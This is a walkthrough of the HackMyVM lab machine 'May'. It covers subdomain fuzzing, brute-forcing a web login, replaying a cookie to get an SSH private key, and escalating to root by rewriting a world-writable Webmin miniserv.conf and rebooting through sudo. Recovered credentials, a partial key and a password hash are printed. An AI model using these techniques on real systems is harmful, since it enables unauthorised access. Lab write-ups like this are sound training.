HackMyVM: May
This is May. It’s Medium rated.
Ports
SSH, HTTP and Webmin on Port 10000.
HTTP
nmap says:
http-title: Did not follow redirect to http://may.hmv
So I add that to /etc/hosts. I visit the homepage and get this:
admin: Web is under construction. Use Intranet.
marie: Where are now the keys?
alice: Yes, where are?
admin: :’(
So we have three usernames, plus a suggestion of subdomains. Good enough for me:
┌──(root💀kali)-[/opt/hackmyvm/may]
└─# wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://may.hmv" -H "Host: FUZZ.may.hmv" -t 42 --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://may.hmv/
Total requests: 114441
ID Response Lines Word Chars Payload
000000048: 200 11 L 31 W 406 Ch "portal"
000000183: 200 10 L 31 W 405 Ch "ssh"
Total time: 0
Processed Requests: 114441
Filtered Requests: 114439
Requests/sec.: 0At both ssh.may.hmv and portal.may.hmv we get simple login forms, and all the fuzzing in the world doesn’t find anything else. I try bruteforcing with my usernames, and eventually:
POST /check.php HTTP/1.1
Host: portal.may.hmv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://portal.may.hmv
Connection: close
Referer: http://portal.may.hmv/
Upgrade-Insecure-Requests: 1
user=marie&password=rebeldeprompts this response:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:26:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX
Content-Length: 56
Hi marie!Portal is under development too.Come back laterThis was using Burp Turbo Intruder and /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt
Now if we try using our cookie at the other subdomain?
POST /check.php HTTP/1.1
Host: ssh.may.hmv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://ssh.may.hmv
Connection: close
Referer: http://ssh.may.hmv/
Upgrade-Insecure-Requests: 1
Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX
user=marie&password=rebeldeWe get this:
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1823
<pre>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA3HwQ6G67tSrcxTN2oOKplVae0b+gVe0x/btFSgGJy2bMoWc14qBO
jE7cEcO8tEB85mI3ftByjp6ZVcQWdmEFvqDjeiGvucu0cnO/kTYZGue34/P0+3TJ4Dn92l
# etc
l1iMe5oHRwklV/d5eEM/8bTl0MgDEhMYRLkmkuuhOb6rVIz3y3PVmE0zeQa2u6qj0stmLm
34pXoHjrR2KlUk5pvoXbcvm8TvnHypnIwls1QL5WsHMGNjt/AbboqLkA2m+v9IEEIww40w
8fGOoN87zX40QP6lAAAACW1hcmllQG1heQE=
-----END OPENSSH PRIVATE KEY-----
</pre>Bingo.
┌──(root💀kali)-[/opt/hackmyvm/may]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/hackmyvm/may]
└─# ssh -i id_rsa marie@10.10.10.43
Linux may 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 22 03:34:48 2021
marie@may:~$
marie@may:~$ sudo -l
Matching Defaults entries for marie on may:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User marie may run the following commands on may:
(ALL) NOPASSWD: /usr/sbin/halt, /usr/sbin/reboot, /usr/sbin/poweroff
marie@may:~$Interesting, but not immediately useful. I run linpeas and find this:
Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
/etc/webmin/miniserv.conf
Hmmm, I’m pretty sure we shouldn’t have access to that. Documentation is sparse, but in the end I create a file:
marie@may:~$ pwd
/home/marie
marie@may:~$ cat miniserv.users
root:$1$84720675$F08uAAcIMcN8lZNg9D74p1:::::1584720675:::0::::This uses the password 123. That’s the kinda thing an idiot would have on his luggage!
marie@may:~$ cat /etc/webmin/miniserv.conf
port=10000
root=/usr/share/webmin
# etc
userfile=/home/marie/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
# etcWe edit /etc/webmin/miniserv.conf as shown above, and use our sudo powers to reboot the server:
sudo -u root /usr/sbin/reboot
Once it reboots, we can login at https://may.hmv:10000 with root:123 and we have access to a root terminal:
[root@may ~]# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
may
Mon Dec 27 06:29:04 EST 2021
[root@may ~]# cd /root
[root@may ~]# ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Jul 22 02:56 .
4.0K drwxr-xr-x 18 root root 4.0K Jul 22 02:54 ..
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Jul 21 15:01 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 13 Jul 22 02:47 root.txt
[root@may ~]# cat root.txt
FLAG_GOES_HERE
[root@may ~]#Bit of fun this one.